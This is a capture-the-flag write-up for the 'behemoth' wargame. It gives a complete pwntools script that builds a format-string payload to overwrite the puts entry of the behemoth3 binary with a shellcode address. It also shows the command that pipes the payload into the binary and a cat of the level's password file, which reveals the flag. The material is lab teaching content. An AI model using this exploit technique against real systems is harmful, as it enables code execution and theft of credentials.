← Back
behemoth4 | Avishai’s CTF Writeups

Avishai's CTF Writeups

Yalla Balagan! A collection of my CTF writeups and solutions.

View on GitHub

first i created profile.rr2 file and put the follow content in it:

program=/behemoth/behemoth3
stdin=input

then, i inserted the payload into the input file:

python3 payload.py > input

and then, when i want to debug with r2 and the given input, i can run this line:

r2 -e dbg.profile=profile.rr2

first, we can see that the binary doesn’t use ASLR, and also the relro is turned off. alt text

so, let’s try to use the format string attack to override the address of the puts function to our shellcode address.

find the address to override: alt text alt text so, the address is: 0x0804b218 the address we want to insert is: 0xffffd53f (same as last level, put shellcode on env, and find its address)

the python script for creating the payload can is here: [level4.py]

from pwn import *
import sys

address_of_puts = 0x0804b218
address_of_shellcode = 0xffffd510

payload = b'JUNK' 
payload += p32(address_of_puts)
payload += b'JUNK' 
payload += p32(address_of_puts+1)
payload += b'JUNK' 
payload += p32(address_of_puts+2)
payload += b'JUNK' 
payload += p32(address_of_puts+3)

printed_chars = len(payload)
byte_to_insert = address_of_shellcode & 0xff
print(byte_to_insert)
res = byte_to_insert - printed_chars

print("res is:",res)
if res <= 4:
    while res <= 4:
        res += 0x100
    payload += b'%' + str(res).encode()+ b'x'  + b'%n'
    printed_chars += res
else:
    payload += b'%' + str(res).encode()+ b'x'  + b'%n'
    printed_chars += res 


byte_to_insert = (address_of_shellcode & (0xff << 8) ) >> 8
print(byte_to_insert)
res = byte_to_insert - printed_chars
print("res is:",res)
if res <= 4:
    while res <= 4:
        res += 0x100
    payload += b'%' + str(res).encode()+ b'x'  + b'%n'
    printed_chars += res
else:
    payload += b'%' + str(res).encode()+ b'x'  + b'%n'
    printed_chars += res


byte_to_insert = (address_of_shellcode & (0xff << 16) ) >> 16
print(byte_to_insert)
res = byte_to_insert - printed_chars
print("res is:",res)
if res <= 4:
    while res <= 4:
        res += 0x100
    payload += b'%' + str(res).encode()+ b'x'  + b'%n'
    printed_chars += res
else:
    payload += b'%' + str(res).encode()+ b'x'  + b'%n'
    printed_chars += res


byte_to_insert = (address_of_shellcode & (0xff << 24) ) >> 24
print(byte_to_insert)
res = byte_to_insert - printed_chars 
print("res is:",res)
if res <= 4:
    while res <= 4:
        res += 0x100
    # payload += b'%' + str(res+4).encode()+ b'x'  + b'%n'
    payload += b'%' + str(res).encode()+ b'x' + b'%n'
    printed_chars += res
else:
    payload += b'%' + str(res).encode()+ b'x'  + b'%n'
    printed_chars += res


sys.stdout.buffer.write(payload)

after building the payload, all left is to run this:

(python3 payload.py;cat) | /behemoth/behemoth3

and then

cat /etc/behemoth_pass/behemoth4
hpjUdlG723

Flag: hpjUdlG723